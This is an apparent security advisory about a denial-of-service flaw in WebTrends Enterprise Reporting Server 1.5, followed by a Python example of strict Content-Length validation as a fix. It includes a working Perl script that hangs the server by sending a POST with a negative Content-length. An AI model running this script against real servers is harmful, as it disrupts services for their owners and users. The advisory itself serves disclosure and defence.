COMMAND

    WebTrends Enterprise Reporting Server

SYSTEMS AFFECTED

    Those using WebTrends Enterprise Reporting Server

PROBLEM

    rpc found the following.  WebTrends Enterprise Reporting Server
    version 1.5 (Linux/Solaris) is vulnerable to a denial of service
    attack utilizing the Content-length field passed to the HTTP daemon.
    If a negative Content-length is passed to the daemon after a POST
    method has been called, the server will stop responding.  WebTrends
    has been notified and a patch is supposedly in the works.  Below is
    an example script to demonstrate the problem.

        Version: 1.5 (1.5a has not been tested)
        OS: Linux 2.2.x and Solaris (v?)
        License: Full

    Code follows:

    #!/usr/bin/perl -w
    # Example DoS against WebTrends Enterprise Reporting Server
    # 8/8/99
    # rpc <jared@antisocial.com>

    use IO::Socket;

    die "usage: $0 <host> <port>" unless (@ARGV == 2);

    ($host, $port) = @ARGV;

    $s = IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp')
    or die "Can't create socket.";

    print $s "POST /\r\n";
    print $s "Content-type: text/plain\r\n";
    print $s "Content-length: -1", "\r\n"x5;

    print "done.\n";

SOLUTION

    Nothing yet.
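    Independent of a vendor patch, the defect is a Content-length value
    accepted without the grammar HTTP gives it (one or more decimal digits,
    no sign).  The following is an added example, not WebTrends code and
    not from the advisory author, of how a daemon should validate the
    header before committing to read a body; the size limit and the sample
    requests are constructed for the example.

```python
import re

# Upper bound on an acceptable request body; an assumption for this example,
# not a WebTrends setting.
MAX_BODY_BYTES = 1024 * 1024

# HTTP defines Content-Length as 1*DIGIT: no sign, no whitespace, no decimals.
_CONTENT_LENGTH_RE = re.compile(r"^[0-9]+$")


def validate_content_length(value):
    """Return the declared body length, or raise ValueError.

    A naive atoi()/int() happily accepts "-1" or "+5"; a negative length is
    exactly what the script above sends, so only the strict grammar passes.
    """
    value = value.strip()
    if not _CONTENT_LENGTH_RE.match(value):
        raise ValueError("malformed Content-Length: %r" % value)
    length = int(value)
    if length > MAX_BODY_BYTES:
        raise ValueError("Content-Length %d exceeds limit" % length)
    return length


def check_request(raw):
    """Parse the head of a raw request and decide how the daemon should react.

    Returns (status, body_length): 200 means the body may be read and served;
    400 or 411 is the error to answer with instead of blocking on a body the
    client declared as negative or did not declare at all.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method = lines[0].split(" ")[0]
    headers = {}
    for line in lines[1:]:
        name, sep, val = line.partition(":")
        if not sep:
            return 400, 0  # header line without a colon
        headers[name.strip().lower()] = val.strip()
    if "content-length" not in headers:
        return (411, 0) if method == "POST" else (200, 0)
    try:
        return 200, validate_content_length(headers["content-length"])
    except ValueError:
        return 400, 0


# Constructed samples: the request the script above sends, and a benign POST.
MALICIOUS = b"POST /\r\nContent-type: text/plain\r\nContent-length: -1" + b"\r\n" * 5
BENIGN = b"POST / HTTP/1.0\r\nContent-length: 5\r\n\r\nhello"
```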